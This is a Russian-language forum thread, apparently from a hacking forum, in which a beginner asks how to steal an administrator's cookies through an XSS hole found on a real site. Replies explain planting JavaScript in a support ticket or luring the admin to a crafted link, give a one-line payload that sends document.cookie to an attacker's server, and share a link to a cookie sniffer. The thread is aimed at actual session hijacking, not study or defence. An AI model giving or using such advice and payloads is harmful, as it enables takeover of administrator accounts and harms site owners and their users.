как достать куки админа ? (xss)

​

всем привет, я хочу изучать xss, читал статьи в форуме, но так и не нашел ответ моего вопроса... Так, я нашел xss в сайте, но дальше не знаю как достать куки админа и так далее... если можно скиньте ссылку на видео или хорошую статью про xss.
заранее спасибо

 

Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.

 

a как понять XSS активная или пассивная ?

 

активные и пассивные? ты уверен?

 

наверно он не про xss
на 9 из 10 постов про xss хочется кидать линк, хотя бы на вики
https://ru.wikipedia.org/wiki/Межсайтовый_скриптинг

может прочтут

"если можно скиньте ссылку на видео или хорошую статью про xss."
блитц вроде что то такое говорил, "машину купил, права купил, ездить не купил"
то есть в интернетах вы не нашли ни одного описания, ни одного примера использования xss? пздц

 

Если в GET:
document.location=('http://ip/xss.php?' + document.cookie);
Если в POST:
забить

 

да ну? иногда лучше жевать

 

Никто так не делает. Пассивки во фреймах прячутся.

Не надо новичков путать. Пусть сначала поймут суть, а потом уже с классификацией разбираются.
Ачат появился раньше, чем классификация сторед/рефлектед/ДОМ стала общепринятой. Во всех статьи у нас XSS делятся именно на активки/пассивки.

 

Кто-то может поделиться снифером для xss или код скинуть? Буду благодарен

 

Как там на жердочке?)

 

Держи http://kanick.ru/sniffer/ . Когда-то им пользовался. Не знаю,как сейчас,но раньше работал на ура,скорее всего и сейчас тоже)